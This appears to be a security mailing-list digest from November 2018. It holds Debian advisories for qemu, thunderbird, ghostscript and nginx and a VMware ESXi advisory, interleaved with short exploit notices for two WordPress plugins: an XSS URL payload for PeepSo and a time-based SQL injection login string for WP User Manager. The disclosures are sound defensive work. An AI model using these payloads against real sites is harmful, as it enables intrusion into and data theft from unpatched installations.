[SECURITY] [DSA 4338-1] qemu security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-4338-1 secur...@debian.org https://www.debian.org/security/ Moritz Muehlenhoff November 11, 2018 https://www.debian.org/security/faq - - Package: qemu CVE ID : CVE-2018-10839 CVE-2018-17962 CVE-2018-17963 Debian Bug : 908682 910431 911468 911469 Integer overflows in the processing of packets in network cards emulated by QEMU, a fast processor emulator, could result in denial of service. In addition this update backports support to passthrough the new CPU features added in the intel-microcode update shipped in DSA 4273 to x86-based guests. For the stable distribution (stretch), these problems have been fixed in version 1:2.8+dfsg-6+deb9u5. We recommend that you upgrade your qemu packages. For the detailed security status of qemu please refer to its security tracker page at: https://security-tracker.debian.org/tracker/qemu Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAlvobXQACgkQEMKTtsN8 Tja8oRAAoCobtSQUeeX3J/w/+6xgkjqjlJJVJX1UDljdaYbTZGXJH825fLnHVQ4e RlNhnbxtMJyFS13MHKMf0IOrowzVBfkKcyQFe7KuUktkDAs9rWcKT2Z6YS3jNDpU vOGZ4MJLf/VRJSTFPQSzHfdkfpJKBDncgM25a77k9z8j43c9SDHIp0g3+eLNGw74 a+Hbq9Q/Jk8dFTvfcerdbY15ihutpPJumNcXtyZZsRXICV65ERSOaeRFz+UPrXoe fF2RtG29KIflDp6v+T4D9jeTh80YNd8DtLi6el+OeaDq3ZhEfMg1A+LhA9jz73Ak 2yGhXqSYhX6hbSJuD7TDJbzm7Dd74PCKala8MdpWaACtKRNhUtfx5R41X0pWQP2K 1CnQGeHqN9vyGP+7CU5AzAyuu5rz8v1O41efdIliL0HwB4pPueHeQT3N797fAumN v4gos7D7fyVhj5geUlkkPH0trb8doaHxMKOVQ5g9qMMsGOLM2Y6tPD1BloRyqNrM MPEWuOjO6uVz1kD8U7kN4LyeVmck5hE9hmLgxTJKIGdDIT6V+w00Uz+Gmzrk+8ys lm80EexBE64gMtTNmPXufPkjsiFlwlLkh2St+WnhwY0/tUYiLU2QBA/cTaw4opyX 9U9qFVIQE6cgKjNa10fLfuEbLK9rzQJgt9ty7S7utajRXM5Izcc= =q2tu -END PGP SIGNATURE-
[SECURITY] [DSA 4337-1] thunderbird security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-4337-1 secur...@debian.org https://www.debian.org/security/ Moritz Muehlenhoff November 10, 2018 https://www.debian.org/security/faq - - Package: thunderbird CVE ID : CVE-2018-12389 CVE-2018-12390 CVE-2018-12392 CVE-2018-12393 Multiple security issues have been found in Thunderbird: Multiple memory safety errors may lead to the execution of arbitrary code or denial of service. For the stable distribution (stretch), these problems have been fixed in version 1:60.3.0-1~deb9u1. We recommend that you upgrade your thunderbird packages. For the detailed security status of thunderbird please refer to its security tracker page at: https://security-tracker.debian.org/tracker/thunderbird Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAlvnVagACgkQEMKTtsN8 TjZLLg/8D6UsuVY5HfpDkJ//6sb6Gf+RIuYGOapf9zQn/g1F5KO9Fq4A6prMcMZd FlI5FcNKHku3MOgRvoMzO6juSg1ILCBv0sOGDyqE5+8GhRrvj0d/dy8wPuT4mV8O LTf3TnL8MYFJbvDwix3y5qe+pCFYYUwiWPYKqEE7wlog2H1n5Y696ciGpTgr+UXG bDPFCLEQ7lQ8uCvsEcrYMLABm6oFDPFEQDqb510EbkcuOOt2jKfl/H6Uvsca2AYb SEcPP65W6yWThWZIUJpbkO5qRCQYV25SoNNN6iH7SmxHq2WFbuYFa3hlL9+2LcWp iQnknUxWWu651rxOMMhearj6EaJojIP0HqJ6/zvHlrHAUu68a//sLgwMs0eZQU3T liDau325U9sQzlgZ+M6e2QjapYKIKADQSTQA+WhCNSmRjMhErk7VL6f2LpEt4E7H Rfju7ZLhTuCjqT0RfssqHXXnNe0YeQJvH6zwYDBSR6LSnBhr8OiUWARCMYOPV4bH aFjj9ErWY5csfuLZrzbc/C3mszQayjIZAHKDQn494Ag3qI/MZad2GgFsZ/Qbv7ef UDu3OVCl2/EPt0FHXmxZTPHhpKVmMjMB6q9KvaxPfn53N/55tbBm/tcKGQctA6s+ OJZEuRLdAZ+rj0Rh5hd3gh7XYoyxJQEPsAABx2hrwzLlrfTBVx4= =X4zw -END PGP SIGNATURE-
[SECURITY] [DSA 4336-1] ghostscript security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-4336-1 secur...@debian.org https://www.debian.org/security/ Salvatore Bonaccorso November 10, 2018 https://www.debian.org/security/faq - - Package: ghostscript CVE ID : CVE-2018-11645 CVE-2018-17961 CVE-2018-18073 CVE-2018-18284 Debian Bug : 910678 910758 911175 Several vulnerabilities were discovered in Ghostscript, the GPL PostScript/PDF interpreter, which may result in denial of service, disclosure of existence and size of arbitrary files, or the execution of arbitrary code if a malformed Postscript file is processed (despite the dSAFER sandbox being enabled). This update rebases ghostscript for stretch to the upstream version 9.25 which includes additional non-security related changes. For the stable distribution (stretch), these problems have been fixed in version 9.25~dfsg-0+deb9u1. We recommend that you upgrade your ghostscript packages. For the detailed security status of ghostscript please refer to its security tracker page at: https://security-tracker.debian.org/tracker/ghostscript Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAlvm/ClfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2 NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND z0Se0A//YW62Md2U7/eOOqJ7C9xL++VpSl9R6e+6+8gJmPnaP9O7QMjVo3TWOGbm Hsr39ILp1eGX+g6OdlcGqLuX4GokpGrWfo82QcJmMPeezQRkFwLM6D5SeRgHvTAF MqScvxUmeZ6vCtdFYYabYfRpiRGfP63z718vh4PtkHVVy+/svS7cmScM14nDMpKl suj5LvHLB8u3/DFHApz8SBXW9mM2skvPU9rrzx5ChHTE/e4hdSuYdfwC8zod/70N /LRXY33Eo4SAb7PV0vtPTfg0flqpKPVzYLVOUQjev2M0aPOsIk5bIMJYy7Gn6RqM MBnS+ojmW+glUi9y6aF50vnm9xq6Kby1YgK+V/qCAnQVkkfiQKRBMAaQWXHRfgYn aZ0HFUDPp0DfVkSjAU2+REhx3qs4lRJe6bpznwgJQatLzWZZW8UnkPD7O7md2SyW bAwdzF8A6833qnx6zH1RhYMTEpzEacHFqmCRCMtq90rPMeDhOKal+lcG18WfUMtf j6CIpY4KDB8U7vK8iyS7Ozx79kk4vT5lNOrMAvp26oIio+MN2/VQgqtavTH7OpW3 dxrkM6fQQoGYwnbuYzRBHYY1PIK5QO4tUinnXQwuuaMUid/pKj+b7o0s0qlmjH+z QIdS0yArvt5hIfkp++Go/TiEt/SNk7lSh3lGLBbkYmd7FQe3z8Q= =q/b+ -END PGP SIGNATURE-
PeepSo v1.11.2 (WordPress Plugin) - XSS Vulnerability in Members
=== PeepSo v1.11.2 (WordPress Plugin) - Cross-Site Scripting Vulnerability in “Members" === # Exploit Title: PeepSo v1.11.2 (WordPress Plugin) - XSS Vulnerability in Members # Date: [11-09-2018] # Category: Webapps # Author: Socket_0x03 (Alvaro J. Gene) # Email: Socket_0x03 (at) teraexe (dot) com # Website: www.teraexe.com # Software Link: https://wordpress.org/plugins/peepso-core/ # Plugin: PeepSo # Version: 1.11.2 # File: Members # Parameter: query # Language: This application is available in English language. # Plugin Description: PeepSo is a social network plugin for WordPress with different kinds of features, such as user profiles, user registration, and other features. # Cross-Site Scripting Vulnerability: http://www.website.com/wordpress/index.php/members/?blocked/=;>alert(23)
PeepSo v1.11.2 - Time-Based SQL Injection
PeepSo v1.11.2 (WordPress Plugin) - Time-Based SQL Injection # Exploit Title: PeepSo v1.11.2 (WordPress Plugin) - Time-Based SQL Injection # Date: [11-09-2018] # Category: Webapps # Author: Socket_0x03 (Alvaro J. Gene) # Email: Socket_0x03 (at) teraexe (dot) com # Website: www.teraexe.com # Software Link: https://wordpress.org/plugins/peepso-core/ # Plugin: PeepSo # Version: 1.11.2 # Language: This application is available in English language. # Plugin Description: A social network plugin for WordPress with different kinds of features, such as user profiles, user login, user registration, and more features. # Time-Based SQL Injection: First, install WP User Manager v2.0.8. Second, install PeepSo v1.11.2 Third, go to the login panel of WP User Manager: http://www.website.com/wordpress/index.php/login Fourth, type the SQL injection: Username: iawcfqto'=sleep(10)=' Password: password Finally, click on Login
NEW VMSA-2018-0027 VMware ESXi, Workstation, and Fusion updates address uninitialized stack memory usage
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - --- VMware Security Advisory Advisory ID: VMSA-2018-0027 Severity:Critical Synopsis:VMware ESXi, Workstation, and Fusion updates address uninitialized stack memory usage Issue date: 2018-11-09 Updated on: 2018-11-09 (Initial Advisory) CVE number: CVE-2018-6981, CVE-2018-6982 1. Summary VMware ESXi, Workstation, and Fusion updates address uninitialized stack memory usage. 2. Relevant Products VMware vSphere ESXi (ESXi) VMware Workstation Pro / Player (Workstation) VMware Fusion Pro / Fusion (Fusion) 3. Problem Description a. vmxnet3 uninitialized stack memory usage VMware ESXi, Fusion and Workstation contain uninitialized stack memory usage in the vmxnet3 virtual network adapter. This issue may allow a guest to execute code on the host. The issue is present if vmxnet3 is enabled. Non vmxnet3 virtual adapters are not affected by this issue. VMware would like to thank the organizers of GeekPwn2018 and security researcher Zhangyanyu of Chaitin Tech for reporting this issue to us. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the identifier CVE-2018-6981 to this issue. Column 5 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available. VMware Product Running Replace with/ Mitigation/ Product Version on Severity Apply patch Workaround == === == = === ESXi6.7 ESXi Critical ESXi670-201811401-BG None ESXi6.5 ESXi Critical ESXi650-201811301-BG None ESXi6.0 ESXi Critical ESXi600-201811401-BG None Workstation 15.xAnyCritical 15.0.1None Workstation 14.xAnyCritical 14.1.4None Fusion 11.xOS X Critical 11.0.1None Fusion 10.xOS X Critical 10.1.4None b. vmxnet3 uninitialized stack memory usage VMware ESXi, Fusion and Workstation contain uninitialized stack memory usage in the vmxnet3 virtual network adapter. This issue may lead to an information leak from host to guest. The issue is present if vmxnet3 is enabled. Non vmxnet3 virtual adapters are not affected by this issue. VMware would like to thank the organizers of GeekPwn2018 and security researcher Zhangyanyu of Chaitin Tech for reporting this issue to us. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the identifier CVE-2018-6982 to this issue. Column 5 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available. VMware Product Running Replace with/ Mitigation/ Product Version on Severity Apply patch Workaround == === == = === ESXi6.7 ESXi ImportantESXi670-201811401-BG None ESXi6.5 ESXi ImportantESXi650-201811301-BG None ESXi6.0 ESXi N/A not affected N/A Workstation Any AnyN/A not affected N/A Fusion Any OS X N/A not affected N/A 4. Solution Please review the patch/release notes for your product and version and verify the checksum of your downloaded file. ESXi 6.7 Downloads: https://my.vmware.com/group/vmware/patch Documentation: https://docs.vmware.com/en/VMware-vSphere/6.7/rn/esxi670-201811001.html ESXi 6.5 Downloads: https://my.vmware.com/group/vmware/patch Documentation: https://docs.vmware.com/en/VMware-vSphere/6.5/rn/esxi650-201811001.html ESXi 6.0 Downloads: https://my.vmware.com/group/vmware/patch Documentation: https://docs.vmware.com/en/VMware-vSphere/6.0/rn/esxi600-201811001.html VMware Workstation Pro 14.1.4, 15.0.1 Downloads and Documentation: https://www.vmware.com/go/downloadworkstation https://docs.vmware.com/en/VMware-Workstation-Pro/index.html VMware Workstation Player 14.1.4, 15.0.1 Downloads and Documentation: https://www.vmware.com/go/downloadplayer https://docs.vmware.com/en/VMware-Workstation-Player/index.html VMware Fusion Pro / Fusion 10.1.4, 11.0.1 Downloads and Documentation: https://www.vmware.com/go/downloadfusion https://docs.vmware.com/en/VMware-Fusion/index.html 5. References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6981 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6982 - 6.
WP User Manager v2.0.8 - Time-Based SQL Injection
WP User Manager v2.0.8 (WordPress Plugin) - Time-Based SQL Injection # Exploit Title: WP User Manager v2.0.8 (WordPress Plugin) - Time-Based SQL Injection # Date: [11-09-2018] # Category: Webapps # Author: Socket_0x03 (Alvaro J. Gene) # Email: Socket_0x03 (at) teraexe (dot) com # Website: www.teraexe.com # Software Link: https://wordpress.org/plugins/wp-user-manager # Plugin: WP User Manager # Version: v2.0.8 (last version) # File: login # Input: username # Language: This application is available in English language. # Plugin Description: A WordPress plugin to create user profiles with registration, login, password recovery, and other features. # Time-Based SQL Injection: http://www.website.com/wordpress/index.php/login Username: iawcfqto'=sleep(10)=' Password: password Click on Login
[SECURITY] [DSA 4335-1] nginx security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-4335-1 secur...@debian.org https://www.debian.org/security/ Moritz Muehlenhoff November 08, 2018 https://www.debian.org/security/faq - - Package: nginx CVE ID : CVE-2018-16843 CVE-2018-16844 CVE-2018-16845 Three vulnerabilities were discovered in Nginx, a high-performance web and reverse proxy server, which could in denial of service in processing HTTP/2 (via excessive memory/CPU usage) or server memory disclosure in the ngx_http_mp4_module module (used for server-side MP4 streaming). For the stable distribution (stretch), these problems have been fixed in version 1.10.3-1+deb9u2. We recommend that you upgrade your nginx packages. For the detailed security status of nginx please refer to its security tracker page at: https://security-tracker.debian.org/tracker/nginx Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAlvkq1wACgkQEMKTtsN8 TjY+Sw//eT499ax9D25pWjbpRjjJQ+WG5m7xL3zoCJfWymNmQnsgiV7/gGbpOvAV n6OG/Ckq946v0Du4YFiCDlkPY4P5WJR2/qnBNJPbFEcMssJJbuhpZCLAKSMFjm9A 2IZYGGHZDMGcEo9ZSEDJX/nViSpbN+Y8koTXX43ORizeKhmOWVY0Dm7gqm2DESti CQ0EVQyMSqZisiZumoDjn0FrvkQnxvO4GONfYTUcsZf8z4yb03r7rzO/wDgu9JvU 8+L7cgMcq5TFT3LoZ/LvrJOv8GbMa5SUwqp84ePEZMtAH4NYFIyijOF05MKox7Pq zRO/NTkoIQ7/mfz6dHFRl54Ac5iEGnjL7ksC6zL1rD+W2E+JXOnHUpRdmjQ7CvdA /5GnyZSJbvD6D7/c5MBXU8r60ALXc75hiL8ibXM/LExll/vOw7++/7dDqMacSx4O pQl+tduqW+55VMAyT7DKoM5+nZmq2805EH2P4W37uqE1UCh0eJkEK+bp3BLO2Adx IJM1ujtt6Euyu3c1JzZADpiOAsATLxvh1qGxvHmUeXN0ODEYAnV2mgKtZxU8+W+Z JrsrUTTzFKlmPQug7Bvx7CyZ6S/EQchjeD+Ni7W/HRtW7/eSoh0dntBjQUlg50yd K2fAQq6MD37FTHAghC243ZqqcRJDoDXtKfvKm8Zt3ZUnX3XUqVg= =3QLE -END PGP SIGNATURE-